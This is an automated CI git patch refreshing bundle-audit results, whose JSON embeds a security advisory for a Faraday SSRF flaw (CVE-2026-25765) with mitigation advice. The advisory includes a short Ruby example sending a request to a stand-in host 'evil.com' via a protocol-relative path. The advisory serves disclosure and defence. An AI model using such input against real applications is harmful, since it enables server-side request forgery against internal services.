From 82f08296a689ec1a8cc4adebbe23957688e4818c Mon Sep 17 00:00:00 2001 From: cicd Date: Thu, 12 Feb 2026 08:49:54 +0100 Subject: [PATCH] commit by to_remotes 2026-02-12 08:49:54 +0100 from cicd --- bundle-audit-time.txt | 2 +- bundle-audit.json | 2 +- update-info.txt | 8 +------- 3 files changed, 3 insertions(+), 9 deletions(-) diff --git a/bundle-audit-time.txt b/bundle-audit-time.txt index 481f9cbf..1a59d923 100644 --- a/bundle-audit-time.txt +++ b/bundle-audit-time.txt @@ -1 +1 @@ -2026-02-12T08:49:23+01:00 +2026-02-12T08:49:54+01:00 diff --git a/bundle-audit.json b/bundle-audit.json index ac8a68fd..d3cc644f 100644 --- a/bundle-audit.json +++ b/bundle-audit.json @@ -1 +1 @@ -{"version":"0.9.3","created_at":"2026-02-12 08:49:23 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]} \ No newline at end of file +{"version":"0.9.3","created_at":"2026-02-12 08:49:53 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]} \ No newline at end of file diff --git a/update-info.txt b/update-info.txt index 20df6d91..551fedcb 100644 --- a/update-info.txt +++ b/update-info.txt @@ -1,11 +1,5 @@ Updating ruby-advisory-db ... -Updating 1886fa5..826ac19 -Fast-forward - gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml | 45 ++++++++++++++++++++ - gems/faraday/CVE-2026-25765.yml | 75 ++++++++++++++++++++++++++++++++++ - 2 files changed, 120 insertions(+) - create mode 100644 gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml - create mode 100644 gems/faraday/CVE-2026-25765.yml +Already up to date. Updated ruby-advisory-db ruby-advisory-db: advisories: 1058 advisories